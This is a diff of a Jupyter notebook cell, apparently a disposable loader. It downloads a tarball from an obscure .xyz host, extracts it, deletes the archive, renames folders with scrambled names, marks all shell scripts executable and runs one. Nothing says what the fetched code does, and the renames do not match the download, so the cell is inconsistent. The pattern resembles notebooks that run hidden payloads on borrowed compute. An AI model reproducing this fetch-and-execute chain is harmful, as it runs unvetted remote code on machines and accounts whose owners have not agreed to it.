--- a/[update]_ER_BEES_CATOKBROK.ipynb
+++ b/[update]_ER_BEES_CATOKBROK.ipynb
@@ -59,14 +59,14 @@
                     "#10.bestcmts.xyz\t\t\t20.ylocatin.xyz\n",
         "\n",
         "\n",
-        "!wget -O veterbitvddew.tar.gz ganti.veterbit.xyz/omalex/NITRO-BARU.tar.gz\n",
+        "!wget -O veterbitvddew.tar.gz ganti.veterbit.xyz/omalex/ALFA.tar.gz\n",
         "!tar -xf veterbitvddew.tar.gz\n",
         "!rm -rf *.tar.gz\n",
-        "!mv NITRO-BARU WAJveterbitvddewIBGANTIJUGA\n",
+        "!mv GAGAK WAJveterbitvddewIBGANTIJUGA\n",
         "%cd WAJveterbitvddewIBGANTIJUGA\n",
-        "!mv NITROBARU NITROCOY\n",
+        "!mv GAGAK ALFA\n",
         "!chmod +x *.sh\n",
-        "!./nitrosh.sh"
+        "!./loy.sh"
       ],
       "execution_count": null,
       "outputs": []
